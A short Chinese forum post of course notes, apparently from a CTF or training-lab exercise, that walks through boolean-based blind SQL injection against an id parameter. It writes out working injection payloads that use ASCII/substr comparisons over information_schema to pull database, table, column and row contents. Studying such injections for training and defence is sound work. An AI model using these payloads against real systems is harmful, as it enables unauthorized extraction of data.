3.2盲注 小矿工 课程笔记 - Locked

小矿工   ·   发表于 2018-12-5   ·   CTF&WP专版

当 id=1' 是报错

当 id=1' union select 1,2,3--+ 时页面没有任何显示

尝试盲注,先判断数据库命的长度

再查数据库名第一个字母

查ascii表得到s 接着查第二个字母,

得到数据库名 再查表名

?id=1' and (ascii((substr(select table_name from information_schema.tables where table_schema = 'security' limit 2,1),1,1)))>100--+

再查字段名

?id=1' and (ascii((substr(select group_concat(column_name) from information_schema.columns where table_name = 'zkaq' limit 2,1),1,1)))>100--+

再查内容

?id=1' and (ascii((substr((select group_concat(zKaQ) from zkaq limit 2,1),1,1)))>100--+

打赏我,让我更有动力~

0 Reply   |  Until 2018-12-5 | 469 View
LoginCan Publish Content
返回顶部 投诉反馈

掌控者 © 2016. All Rights Reserved. 掌控者

Powered by 掌控者 Version 2.1.3